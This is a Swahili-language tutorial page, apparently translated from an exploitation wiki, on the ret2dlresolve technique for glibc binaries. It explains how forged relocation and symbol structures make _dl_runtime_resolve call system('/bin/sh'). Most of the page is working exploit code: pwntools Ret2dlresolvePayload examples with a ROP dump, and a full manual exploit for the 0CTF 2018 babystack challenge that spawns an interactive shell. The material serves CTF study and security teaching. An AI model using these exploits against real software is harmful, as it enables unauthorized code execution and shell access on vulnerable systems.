Kama ilivyoelezwa kwenye ukurasa kuhusu GOT/PLT na Relro, binaries bila Full Relro zitaresolve alama (kama vile anwani za maktaba za nje) mara ya kwanza zinapotumiwa. Urekebishaji huu hufanyika kwa kuita kazi ya _dl_runtime_resolve.
Kazi ya _dl_runtime_resolve huchukua kutoka kwenye steki marejeo kwa baadhi ya miundo inayohitajika ili kuresolve alama iliyotajwa.
Hivyo basi, niwezekano wa kuiga miundo yote hii ili kufanya urekebishaji wa kiungo cha kudaiwa (kama vile kazi ya system) na kuipiga na parameta iliyowekwa (k.m. system('/bin/sh')).
Kawaida, miundo yote hii huiigwa kwa kutengeneza mnyororo wa ROP wa awali unaopiga read juu ya kumbukumbu inayoweza kuandikwa, kisha miundo na neno '/bin/sh' hupitishwa ili waweze kuhifadhiwa na kusomwa kwa kujulikana, na kisha mnyororo wa ROP unaendelea kwa kupiga _dl_runtime_resolve, ikimruhusu kuresolve anwani ya system kwenye miundo bandia na kumpigia anwani hii na anwani ya $'/bin/sh'.
Mbinu hii ni muhimu hasa ikiwa hakuna vifaa vya syscall (kutumia mbinu kama ret2syscall au SROP) na hakuna njia ya kuvuja kwa anwani za libc.
Angalia video hii kwa maelezo mazuri kuhusu mbinu hii katika nusu ya pili ya video:
Au angalia kurasa hizi kwa maelezo hatua kwa hatua:
Weka kwenye steki anwani za miundo kuita _dl_runtime_resolve
Piga _dl_runtime_resolve
system itaresolviwa na kupigwa na '/bin/sh' kama hoja
Kutoka kwenye hati za pwntools, hivi ndivyo shambulio la ret2dlresolve linavyoonekana:
context.binary = elf =ELF(pwnlib.data.elf.ret2dlresolve.get('amd64'))>>> rop =ROP(elf)>>> dlresolve =Ret2dlresolvePayload(elf, symbol="system", args=["echo pwned"])>>> rop.read(0, dlresolve.data_addr)# do not forget this step, but use whatever function you like>>> rop.ret2dlresolve(dlresolve)>>> raw_rop = rop.chain()>>>print(rop.dump())0x0000:0x400593 pop rdi; ret0x0008:0x0 [arg0] rdi =00x0010:0x400591 pop rsi; pop r15; ret0x0018:0x601e00 [arg1] rsi =62991360x0020:b'iaaajaaa'<pad r15>0x0028:0x4003f0 read0x0030:0x400593 pop rdi; ret0x0038:0x601e48 [arg0] rdi =62992080x0040:0x4003e0 [plt_init] system0x0048:0x15670 [dlresolve index]
Mfano
Pwntools Safi
Unaweza kupata mfano wa mbinu hii hapaukiwa na maelezo mazuri sana ya mnyororo wa mwisho wa ROP, lakini hapa kuna shambulizi la mwisho lililotumika:
from pwn import*elf = context.binary =ELF('./vuln', checksec=False)p = elf.process()rop =ROP(elf)# create the dlresolve objectdlresolve =Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])rop.raw('A'*76)rop.read(0, dlresolve.data_addr)# read to where we want to write the fake structuresrop.ret2dlresolve(dlresolve)# call .plt and dl-resolve() with the correct, calculated reloc_offsetlog.info(rop.dump())p.sendline(rop.chain())p.sendline(dlresolve.payload)# now the read is called and we pass all the relevant structures inp.interactive()
Ghafi
# Code from https://guyinatuxedo.github.io/18-ret2_csu_dl/0ctf18_babystack/index.html# This exploit is based off of: https://github.com/sajjadium/ctf-writeups/tree/master/0CTFQuals/2018/babystackfrom pwn import*target =process('./babystack')#gdb.attach(target)elf =ELF('babystack')# Establish starts of various sectionsbss =0x804a020dynstr =0x804822cdynsym =0x80481ccrelplt =0x80482b0# Establish two functionsscanInput =p32(0x804843b)resolve =p32(0x80482f0)#dlresolve address# Establish size of second payloadpayload1_size =43# Our first scan# This will call read to scan in our fake entries into the plt# Then return back to scanInput to re-exploit the bugpayload0 =""payload0 +="0"*44# Filler from start of input to return addresspayload0 +=p32(elf.symbols['read'])# Return readpayload0 += scanInput # After the read call, return to scan inputpayload0 +=p32(0)# Read via stdinpayload0 +=p32(bss)# Scan into the start of the bsspayload0 +=p32(payload1_size)# How much data to scan intarget.send(payload0)# Our second scan# This will be scanned into the start of the bss# It will contain the fake entries for our ret_2_dl_resolve attack# Calculate the r_info value# It will provide an index to our dynsym entrydynsym_offset = ((bss +0xc) - dynsym) /0x10r_info = (dynsym_offset <<8) |0x7# Calculate the offset from the start of dynstr section to our dynstr entrydynstr_index = (bss +28) - dynstrpaylaod1 =""# Our .rel.plt entrypaylaod1 +=p32(elf.got['alarm'])paylaod1 +=p32(r_info)# Emptypaylaod1 +=p32(0x0)# Our dynsm entrypaylaod1 +=p32(dynstr_index)paylaod1 +=p32(0xde)*3# Our dynstr entrypaylaod1 +="system\x00"# Store "/bin/sh" here so we can have a pointer ot itpaylaod1 +="/bin/sh\x00"target.send(paylaod1)# Our third scan, which will execute the ret_2_dl_resolve# This will just call 0x80482f0, which is responsible for calling the functions for resolving# We will pass it the `.rel.plt` index for our fake entry# As well as the arguments for system# Calculate address of "/bin/sh"binsh_bss_address = bss +35# Calculate the .rel.plt offsetret_plt_offset = bss - relpltpaylaod2 =""paylaod2 +="0"*44paylaod2 += resolve # 0x80482f0paylaod2 +=p32(ret_plt_offset)# .rel.plt offsetpaylaod2 +=p32(0xdeadbeef)# The next return address after 0x80482f0, really doesn't matter for uspaylaod2 +=p32(binsh_bss_address)# Our argument, address of "/bin/sh"target.send(paylaod2)# Enjoy the shell!target.interactive()
32bit, hakuna relro, hakuna canary, nx, hakuna pie, msingi wa kujaza kijanja kidogo na kurejea. Kuitumia, kujaza kijanja kinatumika kuita read tena na sehemu ya .bss na ukubwa mkubwa, kuhifadhi hapo mizani bandia ya dlresolve ili kupakia system, kurudi kwa msingi na kutumia tena kijanja cha awali kuita dlresolve na kisha system('/bin/sh').
